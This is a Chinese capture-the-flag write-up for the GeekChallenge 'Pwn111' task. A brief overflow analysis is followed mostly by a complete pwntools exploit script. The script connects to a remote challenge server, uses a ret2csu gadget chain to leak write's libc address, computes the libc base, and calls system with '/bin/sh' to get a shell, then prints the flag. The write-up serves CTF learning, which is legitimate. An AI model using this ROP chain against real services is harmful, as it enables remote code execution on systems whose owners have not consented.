[GeekChallenge]Pwn Pwn111
0x00 逆向分析
可以看到read 0x200字节,但是buf只有0x80字节,典型的栈溢出。
再看函数列表:
有write read,典型的ret2csv题
0x01 脚本
#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
io = remote('81.69.0.47',1122)
elf = ELF('./pwn111')
libcfile = ELF('./libc')
pop_rdi = 0x401233
buff_size = 0x80
main = elf.sym['main']
read_plt = elf.plt['read']
read_got = elf.got['read']
write_plt = elf.plt['write']
write_got = elf.got['write']
fakerbp = 'bi0xbi0x'
csu_end_addr = 0x40122A
csu_front_addr = 0x401210
def csu(rbx, rbp, r12, r13, r14, r15, last):
# pop rbx,rbp,r12,r13,r14,r15
# rbx should be 0,
# rbp should be 1,enable not to jump
# r15 should be the function we want to call
# rdi=edi=r12d
# rsi=r13
# rdx=r14
payload = 'a' * buff_size + fakerbp
payload += p64(csu_end_addr) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
payload += p64(csu_front_addr)
payload += 'a' * 0x38
payload += p64(last)
io.send(payload)
sleep(1)
print(io.recv())
csu(0,1,1,write_got,8,write_got,main)
real_write = u64(io.recv(8))
print(hex(real_write))
retn = 0x401234
libc_base = real_write - libcfile.sym['write']
binsh = libc_base + 0x18ce17
system = libc_base + libcfile.sym['system']
def hackin():
payload = 'a' * buff_size + fakerbp + p64(retn)
payload += p64(pop_rdi) + p64(binsh) + p64(system)
io.sendline(payload)
hackin()
io.interactive()
#脚本模板详见:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/medium-rop-zh/
csu函数主要作用为控制寄存器rdi,rsi,rdx(调用函数时前三个参数所在的寄存器)
使得控制write函数写出write函数在libc中真实地址,从而计算出libc的基地址libc_base。
有了基地址以后调用hackin()
hackin()主要作用是调用libc中的system和binsh实现获取shell
flag:SYC{C0n9r4tulat1on_Y0u_F1nd_how2Rop}